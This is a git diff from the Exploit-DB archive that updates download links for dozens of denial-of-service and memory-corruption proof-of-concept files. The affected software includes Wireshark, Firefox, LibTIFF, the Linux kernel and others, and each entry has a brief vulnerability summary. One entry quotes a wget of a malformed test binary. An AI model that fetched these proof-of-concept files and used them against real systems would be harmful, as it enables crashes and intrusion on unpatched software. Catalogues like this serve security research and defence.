b/exploits/linux/dos/28367.txt index 8f8eae6f5..33fa41316 100644 --- a/exploits/linux/dos/28367.txt +++ b/exploits/linux/dos/28367.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex AlsaPlayer 0.99.76, the CVS version as of 9 Aug 2006, and prior versions are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28367.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28367.zip \ No newline at end of file diff --git a/exploits/linux/dos/28380.txt b/exploits/linux/dos/28380.txt index e8978a812..f7aeb1a19 100644 --- a/exploits/linux/dos/28380.txt +++ b/exploits/linux/dos/28380.txt @@ -6,4 +6,4 @@ Attackers may likely exploit this issue to execute arbitrary machine code in the Mozilla Firefox is vulnerable to this issue. Due to code reuse, other Mozilla products are also likely affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28380.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28380.zip \ No newline at end of file diff --git a/exploits/linux/dos/28383.txt b/exploits/linux/dos/28383.txt index 308a288fb..132458158 100644 --- a/exploits/linux/dos/28383.txt +++ b/exploits/linux/dos/28383.txt @@ -6,4 +6,4 @@ This issue allows attackers to execute arbitrary machine code in the context of ImageMagick versions in the 6.x series, up to version 6.2.8, are vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28383.sgi \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28383.sgi \ No newline at end of file diff --git a/exploits/linux/dos/28384.txt b/exploits/linux/dos/28384.txt index edec2e8f2..cac98c818 100644 --- a/exploits/linux/dos/28384.txt +++ b/exploits/linux/dos/28384.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Versions 2.1.2, SVN 8406, and prior are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28384.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28384.zip \ No newline at end of file diff --git a/exploits/linux/dos/28895.txt b/exploits/linux/dos/28895.txt index 7345a3d4e..579002306 100644 --- a/exploits/linux/dos/28895.txt +++ b/exploits/linux/dos/28895.txt @@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28895.img.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28895.img.gz \ No newline at end of file diff --git a/exploits/linux/dos/28912.txt b/exploits/linux/dos/28912.txt index 4f863f451..ab41b71e1 100644 --- a/exploits/linux/dos/28912.txt +++ b/exploits/linux/dos/28912.txt @@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. This issue An attacker can exploit this issue to crash the affected computer, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28912.iso.bz2 \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28912.iso.bz2 \ No newline at end of file diff --git a/exploits/linux/dos/29399.txt b/exploits/linux/dos/29399.txt index 926005b53..89338191a 100644 --- a/exploits/linux/dos/29399.txt +++ b/exploits/linux/dos/29399.txt @@ -4,4 +4,4 @@ Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilitie An attacker may be able exploit this issue to execute arbitrary code within the context of the affected application. In some circumstances, the vulnerability can be exploited only to cause a denial of service. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29399.pdf \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29399.pdf \ No newline at end of file diff --git a/exploits/linux/dos/29520.txt b/exploits/linux/dos/29520.txt index 501f5bc07..cf2765fca 100644 --- a/exploits/linux/dos/29520.txt +++ b/exploits/linux/dos/29520.txt @@ -4,4 +4,4 @@ Applications using the gtk2 library may be prone to a denial-of-service vulnerab An attacker can exploit this issue to crash applications on a victim's computer. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29520.mbox \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29520.mbox \ No newline at end of file diff --git a/exploits/linux/dos/29723.txt b/exploits/linux/dos/29723.txt index 7156249f3..e718e7abf 100644 --- a/exploits/linux/dos/29723.txt +++ b/exploits/linux/dos/29723.txt @@ -10,4 +10,4 @@ Firefox 2.0.0.2 is prone to this issue; other versions may also be affected. GIMP version 2.2.12 is also reported vulnerable; a segmentation fault occurs when the application processes a malicious GIF image. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29723.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29723.zip \ No newline at end of file diff --git a/exploits/linux/dos/29809.txt b/exploits/linux/dos/29809.txt index 0ba201460..3db9cce29 100644 --- a/exploits/linux/dos/29809.txt +++ b/exploits/linux/dos/29809.txt @@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to consume excessive system resour PulseAudio 0.9.5 is vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29809.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29809.zip \ No newline at end of file diff --git a/exploits/linux/dos/30024.txt b/exploits/linux/dos/30024.txt index c2e2cc65a..c9584a5f5 100644 --- a/exploits/linux/dos/30024.txt +++ b/exploits/linux/dos/30024.txt @@ -6,4 +6,4 @@ Successful exploits of this vulnerability allow remote attackers to execute arbi Versions of libexif prior to 0.6.14 are vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30024.jpg \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30024.jpg \ No newline at end of file diff --git a/exploits/linux/dos/30648.txt b/exploits/linux/dos/30648.txt index 3498cbf1b..022ab4061 100644 --- a/exploits/linux/dos/30648.txt +++ b/exploits/linux/dos/30648.txt @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary machine code in the This issue affects versions prior to AlsaPlayer 0.99.80-rc3. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30648.ogg \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30648.ogg \ No newline at end of file diff --git a/exploits/linux/dos/30776.txt b/exploits/linux/dos/30776.txt index b8698f6ce..0158cce5e 100644 --- a/exploits/linux/dos/30776.txt +++ b/exploits/linux/dos/30776.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30776.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30776.zip \ No newline at end of file diff --git a/exploits/linux/dos/30837.txt b/exploits/linux/dos/30837.txt index cc6b8a50c..62859e2f4 100644 --- a/exploits/linux/dos/30837.txt +++ b/exploits/linux/dos/30837.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause denial-of-service conditions. Given th QEMU 0.9.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30837.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30837.rar \ No newline at end of file diff --git a/exploits/linux/dos/30894.txt b/exploits/linux/dos/30894.txt index cd08d4333..4811a040e 100644 --- a/exploits/linux/dos/30894.txt +++ b/exploits/linux/dos/30894.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary These issues affect PeerCast 0.12.17, SVN 334 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30894.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30894.zip \ No newline at end of file diff --git a/exploits/linux/dos/31018.txt b/exploits/linux/dos/31018.txt index 270688aae..161fc113d 100644 --- a/exploits/linux/dos/31018.txt +++ b/exploits/linux/dos/31018.txt @@ -6,7 +6,7 @@ Successfully exploiting this issue allows remote attackers to deny service to le These issues affect GStreamer 0.10.15; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31018-1.mpg -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31018-2.mpg -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31018-3.m2v -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31018-4.m2v \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31018-1.mpg +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31018-2.mpg +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31018-3.m2v +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31018-4.m2v \ No newline at end of file diff --git a/exploits/linux/dos/31054.txt b/exploits/linux/dos/31054.txt index aca94fd48..d220ee2ea 100644 --- a/exploits/linux/dos/31054.txt +++ b/exploits/linux/dos/31054.txt @@ -6,4 +6,4 @@ Attackers can leverage this issue to execute arbitrary code in the context of an Versions prior to SDL_image 1.2.7 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31054.gif \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31054.gif \ No newline at end of file diff --git a/exploits/linux/dos/31218.txt b/exploits/linux/dos/31218.txt index ada8ef2d0..48ab37108 100644 --- a/exploits/linux/dos/31218.txt +++ b/exploits/linux/dos/31218.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected This issue affects freeSSHd 1.2.0 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31218.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31218.zip \ No newline at end of file diff --git a/exploits/linux/dos/31552.txt b/exploits/linux/dos/31552.txt index 0fced18fb..f80782c83 100644 --- a/exploits/linux/dos/31552.txt +++ b/exploits/linux/dos/31552.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31552.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31552.pcap \ No newline at end of file diff --git a/exploits/linux/dos/31553.txt b/exploits/linux/dos/31553.txt index 21809c7ef..29516bf5b 100644 --- a/exploits/linux/dos/31553.txt +++ b/exploits/linux/dos/31553.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31553.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31553.pcap \ No newline at end of file diff --git a/exploits/linux/dos/31554.txt b/exploits/linux/dos/31554.txt index e3b2d9442..6e162ac7d 100644 --- a/exploits/linux/dos/31554.txt +++ b/exploits/linux/dos/31554.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31554.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31554.gz \ No newline at end of file diff --git a/exploits/linux/dos/31984.txt b/exploits/linux/dos/31984.txt index d41581cf8..6f807e5fa 100644 --- a/exploits/linux/dos/31984.txt +++ b/exploits/linux/dos/31984.txt @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31984.jpg \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31984.jpg \ No newline at end of file diff --git a/exploits/linux/dos/32018.txt b/exploits/linux/dos/32018.txt index e439f61d2..cba915b94 100644 --- a/exploits/linux/dos/32018.txt +++ b/exploits/linux/dos/32018.txt @@ -6,4 +6,4 @@ This issue arises when the software handles maliciously crafted SVG images. According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32018.svg \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32018.svg \ No newline at end of file diff --git a/exploits/linux/dos/32019.txt b/exploits/linux/dos/32019.txt index cb194d503..762af6cc7 100644 --- a/exploits/linux/dos/32019.txt +++ b/exploits/linux/dos/32019.txt @@ -6,4 +6,4 @@ Remote attackers can exploit this issue by enticing victims into opening malicio Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32019.iki \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32019.iki \ No newline at end of file diff --git a/exploits/linux/dos/32452.txt b/exploits/linux/dos/32452.txt index 070c323b3..8bb1bf2df 100644 --- a/exploits/linux/dos/32452.txt +++ b/exploits/linux/dos/32452.txt @@ -17,4 +17,4 @@ UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10. UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32452.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32452.zip \ No newline at end of file diff --git a/exploits/linux/dos/32740.txt b/exploits/linux/dos/32740.txt index 3d6848265..8679382fe 100644 --- a/exploits/linux/dos/32740.txt +++ b/exploits/linux/dos/32740.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause a kernel panic, denying service to leg QNX RTOS 6.4.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32740.bin \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32740.bin \ No newline at end of file diff --git a/exploits/linux/dos/32775.txt b/exploits/linux/dos/32775.txt index 9b16432e6..0e7a0f435 100644 --- a/exploits/linux/dos/32775.txt +++ b/exploits/linux/dos/32775.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the kernel to crash, denying service t This issue affects versions prior to Linux kernel 2.6.27.14. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32775.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32775.gz \ No newline at end of file diff --git a/exploits/linux/dos/32800.txt b/exploits/linux/dos/32800.txt index c1d0aabe0..e28490063 100644 --- a/exploits/linux/dos/32800.txt +++ b/exploits/linux/dos/32800.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash applications These issues affect versions prior to Poppler 0.10.4. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32800.pdf \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32800.pdf \ No newline at end of file diff --git a/exploits/linux/dos/32856.txt b/exploits/linux/dos/32856.txt index 9e66f0c47..33a7003e5 100644 --- a/exploits/linux/dos/32856.txt +++ b/exploits/linux/dos/32856.txt @@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal Successfully exploiting this issue allows remote attackers to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32856.aac \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32856.aac \ No newline at end of file diff --git a/exploits/linux/dos/32857.txt b/exploits/linux/dos/32857.txt index e1c839619..c1e014dd8 100644 --- a/exploits/linux/dos/32857.txt +++ b/exploits/linux/dos/32857.txt @@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal Successfully exploiting this issue allows remote attackers to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32857.ogm \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32857.ogm \ No newline at end of file diff --git a/exploits/linux/dos/33017.txt b/exploits/linux/dos/33017.txt index 70d85038f..9746b13fb 100644 --- a/exploits/linux/dos/33017.txt +++ b/exploits/linux/dos/33017.txt @@ -8,4 +8,4 @@ Acrobat 9.1.1 is vulnerable; other versions may also be affected. NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33017.pdf \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33017.pdf \ No newline at end of file diff --git a/exploits/linux/dos/33049.txt b/exploits/linux/dos/33049.txt index 6a342eab6..864b433a6 100644 --- a/exploits/linux/dos/33049.txt +++ b/exploits/linux/dos/33049.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33049.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33049.zip \ No newline at end of file diff --git a/exploits/linux/dos/33088.txt b/exploits/linux/dos/33088.txt index cc59688f8..13c0b0fb0 100644 --- a/exploits/linux/dos/33088.txt +++ b/exploits/linux/dos/33088.txt @@ -6,5 +6,5 @@ A local attacker can exploit this issue to execute arbitrary code with superuser This issue was introduced in Linux kernel 2.6.30. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33088-1.tgz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33088-2.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33088-1.tgz +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33088-2.tgz \ No newline at end of file diff --git a/exploits/linux/dos/33101.txt b/exploits/linux/dos/33101.txt index 3ce5b3403..7a1c8e10e 100644 --- a/exploits/linux/dos/33101.txt +++ b/exploits/linux/dos/33101.txt @@ -6,4 +6,4 @@ The vulnerability is fixed in Firefox 3.0.12 and 3.5. Note that Thunderbird is a This vulnerability was previously covered in BID 35758 (Mozilla Firefox MFSA 2009-34, -35, -36, -37, -39, -40 Multiple Vulnerabilities) but has been assigned its own record to better document the issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33101.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33101.zip \ No newline at end of file diff --git a/exploits/linux/dos/33134.txt b/exploits/linux/dos/33134.txt index 20043d082..3ac7f8f93 100644 --- a/exploits/linux/dos/33134.txt +++ b/exploits/linux/dos/33134.txt @@ -13,4 +13,4 @@ This issue affects versions *prior to* the following: Flash Player 10.0.32.18 AIR 1.5.2 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33134.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33134.zip \ No newline at end of file diff --git a/exploits/linux/dos/33222.txt b/exploits/linux/dos/33222.txt index 36cfd845e..93359ab32 100644 --- a/exploits/linux/dos/33222.txt +++ b/exploits/linux/dos/33222.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33222.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33222.pcap \ No newline at end of file diff --git a/exploits/linux/dos/33223.txt b/exploits/linux/dos/33223.txt index 7a4ae9f1b..613daf367 100644 --- a/exploits/linux/dos/33223.txt +++ b/exploits/linux/dos/33223.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33223.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33223.zip \ No newline at end of file diff --git a/exploits/linux/dos/33224.txt b/exploits/linux/dos/33224.txt index 50e98a10e..979dbb60d 100644 --- a/exploits/linux/dos/33224.txt +++ b/exploits/linux/dos/33224.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33224.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33224.pcap \ No newline at end of file diff --git a/exploits/linux/dos/33228.txt b/exploits/linux/dos/33228.txt index c65821b72..0f3ca11f2 100644 --- a/exploits/linux/dos/33228.txt +++ b/exploits/linux/dos/33228.txt @@ -6,4 +6,4 @@ Local attackers may be able to exploit this issue to run arbitrary code with ele The Linux Kernel 2.6.31-rc1 through 2.6.31 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33228.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33228.tgz \ No newline at end of file diff --git a/exploits/linux/dos/33233.txt b/exploits/linux/dos/33233.txt index 0aa075c27..663f96ea0 100644 --- a/exploits/linux/dos/33233.txt +++ b/exploits/linux/dos/33233.txt @@ -6,5 +6,5 @@ Attackers may leverage these issues to execute arbitrary code in the context of FFmpeg 0.5 is affected; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33233-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33233-2.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33233-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33233-2.zip \ No newline at end of file diff --git a/exploits/linux/dos/33283.txt b/exploits/linux/dos/33283.txt index 3ea20f351..a73013991 100644 --- a/exploits/linux/dos/33283.txt +++ b/exploits/linux/dos/33283.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by supplying a malicious PDF file or webpage. This issue was previously covered in BID 36638 (Adobe Reader and Acrobat October 2009 Multiple Remote Vulnerabilities), but has been given its own record to better document it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33283.tar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33283.tar \ No newline at end of file diff --git a/exploits/linux/dos/33524.txt b/exploits/linux/dos/33524.txt index 463c9decd..e9c1a3140 100644 --- a/exploits/linux/dos/33524.txt +++ b/exploits/linux/dos/33524.txt @@ -9,4 +9,4 @@ Successful exploits will cause the application to crash, denying service to legi OpenOffice 3.1.0 and 3.1.1 on Microsoft Windows are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33524.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33524.rar \ No newline at end of file diff --git a/exploits/linux/dos/33549.txt b/exploits/linux/dos/33549.txt index 170048dec..a06f57089 100644 --- a/exploits/linux/dos/33549.txt +++ b/exploits/linux/dos/33549.txt @@ -8,4 +8,4 @@ Successful exploits will cause the application to crash, denying service to legi OpenOffice 3.1.0 and 3.1.1 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33549.slk \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33549.slk \ No newline at end of file diff --git a/exploits/linux/dos/34228.txt b/exploits/linux/dos/34228.txt index 4b4a93140..b02019d82 100644 --- a/exploits/linux/dos/34228.txt +++ b/exploits/linux/dos/34228.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the affected application, denying serv Mumble versions 1.2.2 and prior are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34228.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34228.zip \ No newline at end of file diff --git a/exploits/linux/dos/34249.txt b/exploits/linux/dos/34249.txt index 4c94611dc..b598bb608 100644 --- a/exploits/linux/dos/34249.txt +++ b/exploits/linux/dos/34249.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to cause the applications to become unrespo Freeciv 2.2.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34249.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34249.zip \ No newline at end of file diff --git a/exploits/linux/dos/34278.txt b/exploits/linux/dos/34278.txt index a073703b6..1028725d5 100644 --- a/exploits/linux/dos/34278.txt +++ b/exploits/linux/dos/34278.txt @@ -4,4 +4,4 @@ LibTIFF is prone to a denial-of-service vulnerability because it fails to proper An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34278.tif \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34278.tif \ No newline at end of file diff --git a/exploits/linux/dos/34279.txt b/exploits/linux/dos/34279.txt index c323d2b94..9304dbf33 100644 --- a/exploits/linux/dos/34279.txt +++ b/exploits/linux/dos/34279.txt @@ -4,4 +4,4 @@ LibTIFF is prone to a denial-of-service vulnerability because it fails to proper An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34279.tif \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34279.tif \ No newline at end of file diff --git a/exploits/linux/dos/34427.txt b/exploits/linux/dos/34427.txt index 88da05704..8d0c96831 100644 --- a/exploits/linux/dos/34427.txt +++ b/exploits/linux/dos/34427.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow an attacker to execute arbitrary co The issue affects OpenSSL 1.0.0a; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34427.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34427.zip \ No newline at end of file diff --git a/exploits/linux/dos/34953.txt b/exploits/linux/dos/34953.txt index fa4048ef1..9ce8a7c60 100644 --- a/exploits/linux/dos/34953.txt +++ b/exploits/linux/dos/34953.txt @@ -5,7 +5,7 @@ FUSE fusermount tool is prone to a race-condition vulnerability. A local attacker can exploit this issue to cause a denial of service by unmounting any filesystem of the system. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34953.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34953.zip diff --git a/exploits/linux/dos/35081.txt b/exploits/linux/dos/35081.txt index ef5b9a768..571bc3bc7 100644 --- a/exploits/linux/dos/35081.txt +++ b/exploits/linux/dos/35081.txt @@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils $ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35081.bin +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35081.bin ... $ strings strings-bfd-badptr2 diff --git a/exploits/linux/dos/35173.txt b/exploits/linux/dos/35173.txt index 53db738bf..1ce879f02 100644 --- a/exploits/linux/dos/35173.txt +++ b/exploits/linux/dos/35173.txt @@ -7,7 +7,7 @@ Attached three PoCs (malformed ELFs) and a screenshot of the panic. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35173.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35173.zip ---- diff --git a/exploits/linux/dos/35432.txt b/exploits/linux/dos/35432.txt index dbc809ff6..977fb3750 100644 --- a/exploits/linux/dos/35432.txt +++ b/exploits/linux/dos/35432.txt @@ -4,4 +4,4 @@ Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL- An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35432.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35432.pcap \ No newline at end of file diff --git a/exploits/linux/dos/36633.txt b/exploits/linux/dos/36633.txt index e950c5441..d8854411d 100644 --- a/exploits/linux/dos/36633.txt +++ b/exploits/linux/dos/36633.txt @@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable. 